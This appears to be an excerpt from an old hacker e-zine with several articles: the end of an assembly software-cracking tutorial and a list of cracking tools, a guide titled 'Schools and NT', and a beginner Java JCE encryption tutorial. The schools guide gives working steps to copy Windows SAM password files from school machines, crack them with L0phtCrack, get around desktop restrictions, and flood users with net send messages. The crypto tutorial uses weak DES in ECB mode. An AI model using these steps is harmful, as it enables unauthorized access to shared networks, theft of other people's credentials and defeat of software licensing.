mov ah,9 ;DOS:print string
int 21h ;display the time prompt
jmp Exit
Exit:
mov ah,3eh
int 21h
mov ax,4c00h
int 21h
END START
**** Source to a 1 byte crack in ASM ****
I hope you will read it through and try to understand it.
I really hope you learned something in this code.
If you want to be a good cracker, then my advise is: Learn ASM.
[7] Friendly asked Questions:
-----------------------------
I get some questions by mail, I hope to answer some of them here.
Question: How do you find the offset in a program?
Answer: That is one of the reasons I wrote this tutorial, if you just read and think at ones, then you will learn.
Question: How can I contact you?
Answer: By mail(see below).
Question: Can you send me some cracking tools?
Answer: Absolutely No! But you can get tools from www.protools.cjb.net.
I hope you wont bug me for this anymore.
[8] Good tools to have:
-----------------------
Besides the most common tools like: SmartCheck, Win32Dasm, SoftICE and Hiew,
there are a few goodies that you can use with cracking.
ProcDump: is brand new type of tool that allows u to Dump, Unpack some Protected
PE files without any need of debugger.
PECRYPT32: is a Packer/Encrypter for Portable Executable Files
Bye PE-Crypt: Decrypter for PECRYPT32
COGEN II: is a real easy patcher to make your cracks with.
BreakICE: is a simple patch that will modify SoftICE so that you could set any kind of Breakpoints.
Windows Commander 4.01: is a file manager for Windows, a tool like the Explorer or
file manager, which comes with windows.
Visual Basic: Easy tool to code your future programs in.
C++: My favourite to program in.
MASM: AN ASM Compiler.
ASPatch: ASPack made its entrance in the shareware-scene.
During that time it has grown to become one of the most popular .exe-packersSince its such a popular packer,
and pretty hard to patch without some knowledge of ASM-programming, I've made this tool..
It is not capable of unpacking the files, but it makes it possible to patch them in memory
after they've been unpacked, without using any loaders or standalone inmemory-patchers.
This is accomplished by making a hook at GetProcAddress and makes an inmemory-patch when the hook is
called from a special location.
Bad Religion, Sublime: To make you chill while your finding the offset.
The most of the tools above is downloadable on www.protools.cjb.net
Another good site to find tools is www.msjessca.da.ru where you will find SmartCheck.
Contact Spyderco Psyops:
------------------------
ocredypS@usa.net
www.dead-kennedys.com
www.commecen.org
........[ Schools and NT ]........................[ Prosthetic ]............
..Intro..
I have been asked this a lot and have seen posted on places
"I want to get the admin password at school" or something like
"I want to get everyone's passwords on my school's network"
Well this is how to do just that but throw in a few tricks.
..SAM / SAM._ Files..
The two files you aim for first.
If your school network doesnt allow the use of Windows Explorer
or the viewing of your local hard drives and you dont know how
to view them. Check ..Getting Windows Explorer.. near the end of
my stuff. Anyway open up windows explorer and browse to
c:\\\\winnt\\\\repair
There you will see the file sam._
Whack in a floppy disk and copy the file to it. Now go and get
yourself a copy of l0phtcrack (www.l0pht.com) and import this SAM._
file. Now if the passwords havent changed in the sam._ file
that you just cracked you will be set and have the passwords otherwise
you need the real shit and the main baby.
This time windows explorer wont be so useful because when you goto
copy the file it will say it is in use by the system.
So if your lucky enough to be able to boot into MS-DOS mode.
(if your school has half a brain hell no) you can simply goto
c:\\\\winnt\\\\system32\\\\config
and whack in a disk once again, yes the same disk (for some reason
people ask use the same disk?) and simply do
copy c:\\\\winnt\\\\system32\\\\config\\\\sam a:\\\\
Now once again grab your copy of L0phtcrack and choose File -> Import SAM File.
Now it's cracking it wait until it's does and vwalla! Your passwords
ready at your service which are recent and will work. Now if booting
into MS-DOS isnt possible and you can reboot the machine once again,
booting into MS-DOS is possible. Make yourself a Windows NT/9* boot disk
and make sure it has NTFS on it. Stick the disk in while it's booting
up and follow the above procedures.
..Getting Windows Explorer..
Most school networks i have seen Windows Explorer and MS-DOS have
been taken out of the Start -> Programs menu.
Here is how to get it again, not on your Programs menu but opened
and useable. Open up your favourite web browser.
Goto the URL and type
c:\\\\winnt\\\\explorer.exe
Now if it asks to save the file you can save it or open it from
the current location. If you are on the type of network where
you are given a drive allocated to save your data save it to there.
because if you log onto a different computer you can just go and run
the same file from there and it will open that computers local hard
drive.
..MS-DOS Prompt..
Now we can do this one three ways.
Do our explorer trick (if it is not in the Programs Menu) and goto
the 3 places it would possibly be kept.
c:\\\\
c:\\\\winnt
c:\\\\winnt\\\\system32
I seem to see a lot that it's kept in the system32 folder.
The three ways of doing it.
1. Open your web browser and type the path to the file.
You may save it and do the same as explorer.exe either run it or save
it.
2. Open Explorer everytime and keep going there everytime you want
MS-DOS prompt.
3. Make a .bat file pointing to the file location so it runs in the
one damn window.
3 is the best choice and (if you dont know how) here's how to do it.
Basically say cmd.exe was kept in c:\\\\winnt\\\\system32 i would open up
notepad and type in it...
c:\\\\winnt\\\\system32\\\\cmd.exe
Then MS-DOS prompt would open. Now all you need to do is simply
run this BAT file each time. Same shit if you have a user space,
save it there and you just run it if you change on different computers.
..Sending / Broadcasting Messages..
What is not liked at all is sending messages to other users while
they are working or whatsoever. But whocares, damn, it's fun.
Here's how to do it using NET.EXE which should become everyone's
favourite toy.
Open a MS-DOS window.
Now here is the command line to run.
Net send <username/computer name> "message"
For Example:
Net send jak33 "fjear my pre$ence"
This will just popup the message "fjear my pre$ence" on jak33's computer.
Now if you are scared of getting caught by the admin and dont want to
be logged off or your account disabled, whatever, fjear not....
It does show the computer name it came from and is traceable but
i dont think the teacher/admin could give a real shit...The real place
where the teachers/admin can give a shit is on an entire network where
every computer gets that message popup.
instead of the one user type in your main server's name instead
for example:
Net send school1 "whoops, i slipped on the wrong key"
I have only tried this on 2 networks in which both have been successful.
They were both running Novell Netware 5 with
Windows NT Workstation on all the client computers.
So dont complain if it doesnt do an entire network at once.
I am outta here....
Peace.
........[ JCE ].......................................[ phunki ]............
Ok, this is the first part of a three part series on implementing cryptology in
java using the JCE aka the Java Cryptology Extensions. Some knowledge of Java
would be beneficial, but maybe if your smart or know other languages you'll be
able to get by. No prior knowledge of cryptology is necessary, as this file will
explain the relevant concepts. The other two files will be a bit more code
intensive, and if you know about cryptology you may just want to skim this file
and have a look at the code. nerf.
Orright, lets rock
------------------------------------------------------------------------------
What is the JCE?
The JCE is a set of classes released by Sun for the implementation of
cryptology. It does a pretty good job at hiding the complexities of cryptology,
so you dont have to worry too much about whats going on under the hood. You will
need to have the JCE (or one of its variants) installed if you want to run the
stuff in these files.
Where can i get the JCE?
The JCE is available for download from Sun's website, http://java.sun.com (or
http://java.sun.com/products/jdk/1.2/jce/ i think). You may notice some scary
mesages about being from the US to be able to download this, there are a few
things you can do about this. First off, you can lie. Give a US adress (Sun's
adress is conviently located at the bottom of its pages :) and postcode. The ban
on cryptology exportation has been lifted (unless you're a jihad), but Sun
hasn't felt the need to update its site, maybe they're lazy, maybe they're
scared of terrorists, maybe they just dont care, oh well. If you feel bad about
providing false information, the JCE is also available from
http://www.wiretapped.net which also has lots of other interesting shit. Another
option is to use a reimplementation of the JCE, created outside the US.
Reimplentations?
To get around the export ban, people in other countries developed their own
implementations of the JCE using the documentation and plain old skill. One of
the best of these would be Cryptix ( http://www.cryptix.org ) which also
provides the source for its stuff, so you can have a bit of a play around.
Cryptix supports a shitload more cipher algorithms and is the only other free
provider aside from Sun. I personally had a bitch of a time installing it, and
couldn't be fucked screwing round for a few hours trying to get java to
recognise it, as Cryptix's documentation is somewhat sparse although this is
being improved. All in all though id recommend using the offical JCE while your
getting the hang of things.
----------------------------------------------------------------------------
Ok, lets have a look at some concepts.
Keys
If you take the view that encryption is what you use to lock your data away from
prying eyes, you'll need a key to lock and unlock it. In practise, a key is
(generally) a big ass string of characters used by whatever algorithm to
encrypt and decrypt your data. One very common sort of key is the key pair,
which is used in pgp and all over the shop. When you create a key pair you get a
public key and a private key. The public key is just that, public, you should
make this easily available for anyone to access. When someone wants to send you
something encrypted, they will encrypt it using your public key. Data encrypted
with a cerain public key can only be decrypted using its partner private key,
generated at the same time. Your private key is also as its name implies,
private. If someone gets your private key, they can decrypt data meant only for
you, so keep it safe. There is another type of key, the session key.
Session keys
Just say you and me wanted to have a conversation over an encrypted network
channel, we could create whats called a session key. This is like a private key
from above, but we both use the same one to encrypt our conversation. If we have
another conversation at a later date, we'd use a different key (another session,
another key, session key, wow). A session key is whats called a symmetric
cipher, whereas a key pair is an asymmetric cipher. Why have two different
types? Well, there are some problems with symmetric ciphers, basically, if
someone untrusted gets your key, your fucked. Thats why the public/private keys
are a good way to encrypt data, because no-one at all has to know your private
key, you dont have to transmit it over an insecure medium (maybe your connection
is being sniffed, maybe your phone is tapped, how paranoid do you want to go? :)
there are however implementation problems with asymmetric ciphers, that is
they're kinda slow. They're great for encrypting email and "static" data, but to
have a conversation of an encrypted network using an asymmetric cipher would be
a bit of a pain in the ass to implement (There are some technical reasons for
this i'll explain in a bit more detail later, see the section on symmetric block
and stream ciphers below.).
Ciphers
So what are these ciphers? How do they work? First off we'll have a look at
symmetric ciphers. It's where the same key is used to encrypt and decrypt a
piece of data. When you type something out and it can be read, its called plain
text. Once the plain text has been encrypted, you have whats called cipher text,
which cant really be read unless you have the correct means to decrypt it
(unless your the nsa or something :P) . Lets have a look at this
diagramatically:
Session Key Session Key
\\\\------/ \\\\------/
plain text ----> Cipher -----> cipher text -----> Cipher ----> plain text
/------\\\\ /------\\\\
Sender Network / Insecure Medium Receiver
Ok, the sender first types out their message in plain text, then encrypts it
using a cipher (encryption algorithm) and the session key, Now we have the
cipher text, which can be sent safely across an insecure medium. Note that this
can still be sniffed/intercepted, but would be of little use to anyone unless
they have a few spare cray's lying around and a couple of centuries to kill.
Once the cipher text reaches its destination, it is put through a cipher again
to decrypt the message using the same key and out comes the plain text. This is
an example of a symmetric cipher, as it uses the same key to encrypt and decrypt
the data. Quicker, but the possiblity of compromise is greater. Lets have a look
at how an asymmetric cipher works, with bob sending a messasge to al:
Al's public Al's private
key key
Bob: \\\\-------/ \\\\-------/ Al:
plain text ----> Cipher ---> cipher text ---> Cipher ----> plain text
/-------\\\\ /-------\\\\
Sender Network / Insecure Medium Receiver
Here, the sender, Bob, encrypts his message to Al using Al's public key. Once
its been encrypted, its now safe for Bob to send it over an insecure medium,
like the internet. Once Al receives it, he decrypts it using his private key,
and can read the message:
"lets go smash some shit!"
el8! Bob and Al can now express there frustration at societys' ill's and their
inability to make a difference, without fear of ASIO waiting for them, or Frank,
their mutual loser friend with a penchant for packet sniffing, showing up
un-invited.
Ok, we'll have a look at some nuts and bolts of encryption then get into some
code.
A bit deeper into symmetric ciphers
There are two types of symmetric ciphers, block ciphers and stream ciphers.
Block ciphers encrypt and decrypt fixed size blocks of data, generally 64 bits.
Stream ciphers operate on a stream of bits or bytes, and were the way encryption
was accomplished before computers. When a block cipher is used, the message is
broken into blocks and each block is encrypted and decrypted one at a time.
Asymmetric ciphers are block ciphers, and are suited to things like encrypting
emails or files, but if we wanted to have an encrypted channel through which we
could talk to each other, a stream cipher would be more appropiate (eg,
transmitting "Hi" or telnet commands would be quite ineffcient or awkward if we
were using a block cipher)
Padding
When we do implement a block cipher, we cant rely on the fact that everything we
type or want to encrypt will be in nice 64 bit blocks. Therefore, we can use
what's called padding to fill out the rest of the block before it is encrypted.
Throughout these files we'll be using PKCS#5 padding, which is a "standard"
published by RSA Data Security. What this does is fill the leftover bytes in the
plaintext block with the number of leftover bytes in the plaintext block. Sounds
simple right? :) To understand this just pretend the 64 bit block is eight bytes
(which it is, 8 bits in a byte, 8 bytes == 8 bits * 8 == 64 bits, but just bear
with me) and we have five bytes of data in our final block, which leaves three
bytes of empty space. In these leftover three bytes, we would use the value 3 to
pad it out to the full 8 bytes. If we had 4 bytes used, leaving four bytes free,
it would be padded out with the value 4. Here's a diagram to help you understand
that a bit better:
5 bytes ---------------------------------------------------------------
(3 bytes | blah | blah | blah | blah | blah | 3 | 3 | 3 |
to pad) ---------------------------------------------------------------
4 bytes ---------------------------------------------------------------
(4 bytes | blah | blah | blah | blah | 4 | 4 | 4 | 4 |
to pad) ---------------------------------------------------------------
2 bytes ---------------------------------------------------------------
(6 bytes | blah | blah | 6 | 6 | 6 | 6 | 6 | 6 |
to pad) ---------------------------------------------------------------
0 bytes ---------------------------------------------------------------
(8 bytes | 8 | 8 | 8 | 8 | 8 | 8 | 8 | 8 |
to pad) ---------------------------------------------------------------
In the last one, we see what happens if our plaintext block happens to end
perfectly on a block boundary. To prevent any ambiguity when it comes to
stripping the padding, an entire block of padding is added.
Modes
Each cipher needs a mode. A mode determines how the blocks of plaintext are
encrypted into blocks of ciphertext and vice versa. The sun JCE supports ECB,
CBC, CFB, OFB and PCBC modes. We'll only look at two of these modes, ECB in this
part and CFB in a later part. The mode affects how resistant the ciphertext is
to break. There's a trade off between robustness from transmission errors and
the resistance of the ciphertext to being broken. Im not going to go too deep
into modes, maybe in a later part, because modes and the different methods they
use are a subject in themselves.
ECB Mode
ECB stands for Electronic Code Book, and is the simplest mode. Each block of
plaintext encrypts into one block of ciphertext. A disadvantage of this is the
same piece of plaintext will always encrypt into the same piece of ciphertext,
which is a weakness that can be exploited by someone trying to break the
encryption. (Eg if you're writing an email, the word "and" would appear numerous
times, a pattern which could be easily picked up on and used to aid in breaking
the encryption). One advantage of ECB is robustness when transmission errors
occur. Using other modes, an error will affect subsequent blocks, but not so
with ECB, its simplcity provides it a strength.
Algorithms
This is whats used to actually encrypt the data. Theres lots of them, and its
way beyond the scope of this file to go into their internal workings. In
reality, implementing crypto using the JCE doesn't really need any understanding
of how the specific algorithms work, just a knowledge of which algorithm is best
suited for a particular need. It's always good to know though, and a good book
is Applied Cryptology by Bruce Schneier, which covers the math behind cryptology
and also the state of it in the world.
Just a one more thing to look at, then you'll be able to understand whats going
on in the code.
Base64
When we encrypt something in java, all we get is an array of raw encrypted
bytes. Now, many mail programs and sometimes even the screen just cant handle
raw bytes, so we need to convert the byte arrays to ASCII before we can
display/send the encrypted message. Base64 is a handy way to do this. It's
system is fully described in RFC1521 sec 5.2, but Java contains two undocumented
classes that will handle base64 encoding and decoding for us. These are
sun.misc.BASE64Encoder (takes an array of bytes and generates a string) and
sun.misc.BASE64Decoder (takes a string and generates an array of bytes).All
we'll be using it for is to create easily readable strings.
Fuck yeah, lets rock
/*****************************************************************************
* Ok, we're just gonna get a feel for how the JCE is used. This will take a
* string and encrypt or decrypt it. With a little effort, you could make it
* take a filename as an argument, and encrypt the whole file. All in all, this
* is relatively basic when compared to whats gonna be in the later parts :D
*
* First off, we get or create a key, which will be read from a file. Then we
* create a cipher object, in this case it will
be the DES algorithm using ECB
* mode and PKCS#5 padding (called PKCS5Padding internally by java). Once that's
* done, we'll bang a string through it and print the output to the screen. how
* exciting.
*******************************************************************************/
import java.io.*;
import java.security.*;
import javax.crypto.*; //YEAH!
import sun.misc.*; //for our base64 stuff
public class BasicCrypt {
public static void main(String[] args) throws Exception {
//check the arguments
if (args.length < 2) {
System.out.println("Usage: BasicCrypt <-e | -d> <text> ");
return;
}
/******************************************************************************
* Now we're going to first see if a key exists and open it if it does,
* otherwise we'll create a new one using DES. This can take a minute so dont
* stress if it seems like it's hung. If you have a key already and would like
* to use it, _make a copy_ and put it in the directory your running this from.
* Make a copy, i will not accept any responsibilty if you lose your key or it
* gets fucked over by the file i/o. If you dont like that, dont run the
* program.
******************************************************************************/
Key key;
try {
//copy your damn key
ObjectInputStream inputStream = new ObjectInputStream(new
FileInputStream("myKeyCopy.ser"));
//read in the key
key = (Key)inputStream.readObject();
//close the input stream, if you dont do this, you'll lose your key
inputStream.close();
}
//if they dont have a key, make a new one
catch (FileNotFoundException e) {
//mmm, user-friendly
System.out.println("No existing key found, generating new one");
//we want our new key to use DES
KeyGenerator keyGen = KeyGenerator.getInstance("DES");
//get a realish random number
keyGen.init(new SecureRandom());
//now hows this for simple
key = keyGen.generateKey();
//we want to save our key for future use, so we write it to a file
ObjectOutputStream outputStream = new ObjectOutputStream(new
FileOutputStream("myKeyCopy.ser"));
outputStream.writeObject(key);
outputStream.close();
}
/*******************************************************************************
* Ok, so now we have our key, we'll create a cipher object so we can encrypt our
* data, we're going to use DES with PCKS#5 padding and mode ECB. Pretty easy as
* you'll see.
*******************************************************************************/
//mmm, challenge
Cipher ourCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
/*******************************************************************************
* So now we have our cipher instance and our key, we'll check our args to see if
* we should be encypting or decrypting the data. e for encrypt, d for decrypt.
*******************************************************************************/
//if we want to encrypt
if (args[0].indexOf("e") != -1) {
//tell java we want to encrypt and to get ready, using our already
//initialised cipher and key
ourCipher.init(Cipher.ENCRYPT_MODE, key);
//get what we want to encrypt
String textToEncrypt = args[1];
//get the rest of the words to encrypt, which would've been stored
//as extra args
for (int i = 2; i < args.length; i++) {
textToEncrypt += " " + args[i];
}
//now create our byte array and give it our string
byte[] textBytes = textToEncrypt.getBytes("UTF8");
//Encrypt that mofo
byte[] crypted = ourCipher.doFinal(textBytes);
//ok, nows its been encrypted, we'll use base64 and print it out to
//the screen
BASE64Encoder b64Encoder = new BASE64Encoder();
//a string to put the base64 encoded stuff, remember crypted is our
//encrypted byte array
String printTemp = b64Encoder.encode(crypted);
//now print it out
System.out.println(printTemp);
}
//now if we want to decrypt a string
else if (args[0].indexOf("d") != -1) {
//tell java we want to decrypt, and get it all ready
ourCipher.init(Cipher.DECRYPT_MODE, key);
//Get our decoder ready
BASE64Decoder b64Decoder = new BASE64Decoder();
// our encrypted string, it will be one long string, hence only
//using args[1]
byte[] crypted = b64Decoder.decodeBuffer(args[1]);
//now decrypt the bastard
byte[] textBytes = ourCipher.doFinal(crypted);
//pretty simple eh
//now we'll print our decrypted string to the screen
String printTemp = new String(textBytes, "UTF8");
System.out.println(printTemp);
}//end else if
}// end main
}// end class
------------------------------------------------------------------------------
That wasn't too bad now was it. Notice how the encrypt and decrypt methods
ourCipher.doFinal()
were the same regardless, encryption or decryption is specified in the line
ourCipher.init(Cipher.ENCRYPT_MODE, key); or
ourCipher.init(Cipher.DECRYPT_MODE, key)
the init method needs a cipher and a key, which is why they were created first.
Using UTF8 ensures our program is cross-platform portable, but you can use the
default without specifying an encoding by simply calling getBytes() with no
arguments. Well, thats about it for now, part's 2 and 3 should be about soonish
and we'll get into a lot more code and start doing some cool stuff.
lovingly yours,
phunki
v0idnull@yahoo.com
Some Good Books
Java Specific
Java Cryptography by Jonathan Knudsen published by O'Reilly
- All you'd ever want to know about Java Cryptography, a lot of the code you'll
see here is based on the stuff in this book. good book
Java Security by Scott Oaks published by O'Reilly
- Covers the entire Java Security API, dont have it, cant comment
Java - An Introduction to Computer Science & Programming by Walter Savitch
published by Prentice Hall
- A good book for learning Java. As much as i hate java, its good for getting
to know the Object Orientated Paradigm, and a little less cryptic than C/C++
Cryptography Specific
Applied Cryptography by Bruce Schneier published by Wiley
- This book is sort of like TCP/IP Illustrated for crypto, well worth a read
Handbook of Applied Cryptology by Alfred J. Menzies published by CRC Press
- Covers crypto math, dont have it, haven't read it, cant comment
Other
ICQ for Dummies
- honestly, if i ever saw someone looking at this book, i think id save them
some time and kill them there and then.
........[ Outro ].................................[ phase5 ]............
wang
. EOF .
